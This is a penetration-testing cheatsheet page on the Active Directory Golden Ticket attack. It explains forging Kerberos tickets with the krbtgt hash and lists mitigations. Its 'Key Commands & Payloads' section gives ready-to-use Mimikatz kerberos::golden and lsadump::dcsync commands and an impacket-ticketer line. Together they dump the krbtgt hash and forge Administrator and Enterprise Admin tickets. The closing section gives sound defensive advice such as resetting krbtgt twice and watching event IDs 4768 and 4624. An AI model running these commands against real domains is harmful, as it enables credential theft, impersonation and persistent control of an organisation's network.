Back to Active Directory

Golden Ticket

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

Golden Ticket is a persistence attack where an attacker with access to the krbtgt account's password hash can forge arbitrary Kerberos Ticket Granting Tickets (TGTs). This allows access to any resource in the domain with any identity.

The krbtgt hash is the most valuable target in an AD environment, as it grants unlimited domain access without any time restrictions.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Golden Ticket:

kerberos::golden /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator /id:500 /ptt
kerberos::golden /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator /id:500 /groups:519 /ptt
impacket-ticketer -nthashes <krbtgt-hash> -domain-sid S-1-5-21-... -domain domain.local Administrator
lsadump::dcsync /domain:domain.local /user:krbtgt

Tools & Techniques

Recommended tools for Golden Ticket:

  • Mimikatz kerberos::golden: golden ticket creation
  • Impacket ticketer: UNIX-based golden ticket generation
  • Requires: krbtgt hash, domain SID, domain name

Prevention & Mitigation

Security recommendations to prevent Golden Ticket:

  • Reset the krbtgt password regularly (every 12-24 months)
  • Reset the krbtgt password twice (due to Kerberos delay) when changing
  • Use a strong, random krbtgt password with high entropy
  • Monitor for anomalous TGT requests (Event ID 4768)
  • Implement privileged access management solutions
  • Detect golden ticket usage via Event ID 4624 correlation

References

Additional resources: